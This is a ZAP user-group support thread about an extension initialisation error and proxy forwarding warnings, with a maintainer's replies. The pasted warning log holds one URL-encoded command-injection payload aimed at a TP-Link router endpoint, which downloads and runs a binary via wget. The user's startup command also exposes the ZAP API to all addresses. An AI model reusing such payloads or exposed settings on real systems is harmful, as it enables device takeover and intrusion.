Issue starting zap on debain 11

140 views
Skip to first unread message

Hari Manne

unread,
Apr 21, 2024, 2:29:35 PM4/21/24
to ZAP User Group
Hi

I'm starting zap using below command.

./gradlew run  --args="-daemon -host <hostname> -config api.addrs.addr.name=.* -config api.addrs.addr.regex=true -config api.key=<key>"

Getting error while starting but could see the zap is accessible

++++++++++++++++
13895 [ZAP-daemon] INFO  org.zaproxy.zap.extension.pscan.ExtensionPassiveScan - Loaded passive scan rule: Use of SAML

13903 [ZAP-daemon] ERROR org.parosproxy.paros.extension.ExtensionLoader - Failed to initialise extension org.zaproxy.zap.extension.pscan.ExtensionPassiveScan, cause: IllegalArgumentException: Parameter addOnClassLoader must not be null.

java.lang.IllegalArgumentException: Parameter addOnClassLoader must not be null.

        at org.zaproxy.zap.extension.pscan.ExtensionPassiveScan.validateNotNull(ExtensionPassiveScan.java:831) ~[main/:?]

        at org.zaproxy.zap.extension.pscan.ExtensionPassiveScan.loadDeclaredClasses(ExtensionPassiveScan.java:775) ~[main/:?]

        at org.zaproxy.zap.extension.pscan.ExtensionPassiveScan.lambda$getPassiveScanRules$1(ExtensionPassiveScan.java:741) ~[main/:?]

        at java.util.HashMap.computeIfAbsent(HashMap.java:1134) ~[?:?]

        at org.zaproxy.zap.extension.pscan.ExtensionPassiveScan.getPassiveScanRules(ExtensionPassiveScan.java:738) ~[main/:?]

        at org.zaproxy.zap.extension.pscan.ExtensionPassiveScan.loadScanRules(ExtensionPassiveScan.java:750) ~[main/:?]

        at java.util.ArrayList.forEach(ArrayList.java:1541) ~[?:?]

        at org.zaproxy.zap.extension.pscan.ExtensionPassiveScan.postInit(ExtensionPassiveScan.java:146) ~[main/:?]

        at org.parosproxy.paros.extension.ExtensionLoader.hookAllExtension(ExtensionLoader.java:1001) [main/:?]

        at org.parosproxy.paros.extension.ExtensionLoader.startLifeCycle(ExtensionLoader.java:836) [main/:?]

        at org.parosproxy.paros.control.AbstractControl.loadExtension(AbstractControl.java:58) [main/:?]

        at org.parosproxy.paros.control.Control.init(Control.java:156) [main/:?]

        at org.parosproxy.paros.control.Control.initSingletonWithoutView(Control.java:394) [main/:?]

        at org.zaproxy.zap.HeadlessBootstrap.initControl(HeadlessBootstrap.java:59) [main/:?]

        at org.zaproxy.zap.DaemonBootstrap$1.run(DaemonBootstrap.java:75) [main/:?]

        at java.lang.Thread.run(Thread.java:829) [?:?]

14068 [ZAP-daemon] ERROR org.zaproxy.addon.client.ExtensionClientIntegration - Failed to get or create Firefox profile zap-client-profile

14976 [ZAP-daemon] INFO  org.flywaydb.core.internal.license.VersionPrinter - Flyway Community Edition 9.20.0 by Redgate

14977 [ZAP-daemon] INFO  org.flywaydb.core.internal.license.VersionPrinter - See release notes here: https://rd.gt/416ObMi

14977 [ZAP-daemon] INFO  org.flywaydb.core.internal.license.VersionPrinter - 

14998 [ZAP-daemon] INFO  org.flywaydb.core.internal.database.base.BaseDatabaseType - Database: jdbc:hsqldb:file:/root/.ZAP_D/db/permanent (HSQL Database Engine 2.7)

15008 [ZAP-daemon] WARN  org.flywaydb.core.internal.database.base.Database - Flyway upgrade recommended: HSQLDB 2.7 is newer than this version of Flyway and support has not been tested. The latest supported version of HSQLDB is 2.6.

15047 [ZAP-daemon] INFO  org.flywaydb.core.internal.command.DbValidate - Successfully validated 1 migration (execution time 00:00.026s)

15067 [ZAP-daemon] INFO  org.flywaydb.core.internal.command.DbMigrate - Current version of schema "PUBLIC": 1

15073 [ZAP-daemon] INFO  org.flywaydb.core.internal.command.DbMigrate - Schema "PUBLIC" is up to date. No migration necessary.

15089 [ZAP-daemon] INFO  org.zaproxy.addon.oast.services.callback.CallbackService - Started callback service on 0.0.0.0:36217

15313 [ZAP-daemon] INFO  org.zaproxy.addon.network.ExtensionNetwork - ZAP is now listening on <hostname>:8080
----------------------

When i trying to scan, getting below message continuously even though the scan got failed.


++++++++++++

324557 [ZAP-IO-Server-1-275] WARN  org.zaproxy.addon.network.internal.server.http.handlers.HttpSenderHandler - Failed to read http://<host public ip>:8080/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F<ip>%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) within 20 seconds, check to see if the site is available and if so consider adjusting ZAP's read time out in the Connection options panel.

Can you help me with resolution on above issues 

thc...@gmail.com

unread,
Apr 22, 2024, 2:49:50 AM4/22/24
to zaprox...@googlegroups.com
Hi,

What's your setup? Which commit in core and which add-ons are installed?


For the warning, is <host public ip> ZAP?

Best regards.

Hari Manne

unread,
Apr 23, 2024, 2:52:47 AM4/23/24
to ZAP User Group
Hi 

I cloned zap-extension and zaproxy repo and ran below commands
++++++++++++

cd /zap/zap-extensions

./gradlew tasks

./gradlew copyMandatoryAddOns

./gradlew copyZapAddOn

./gradlew addOns:pscanrules:copyZapAddOn

cd /zap/zaproxy

./gradlew tasks
./gradlew copyWeeklyAddOns
./gradlew run  --args="-daemon -host <internalhostname> -config api.addrs.addr.name=.* -config api.addrs.addr.regex=true -config api.key=secret"

+++++++++++


For the warning, is <host public ip> ZAP?

> Yes, it's public IP of zap

thc...@gmail.com

unread,
Apr 29, 2024, 4:04:22 AM4/29/24
to zaprox...@googlegroups.com
The first issue should be fixed now.


You should define the public IP address as an alias so ZAP knows that
it's itself and thus not forward those requests.
https://www.zaproxy.org/docs/desktop/addons/network/options/localservers/#aliases

But that request does not seem that would be something that would be
requested to ZAP, did you meant to proxy that instead of using ZAP's
public address?

Best regards.
Reply all
Reply to author
Forward
0 new messages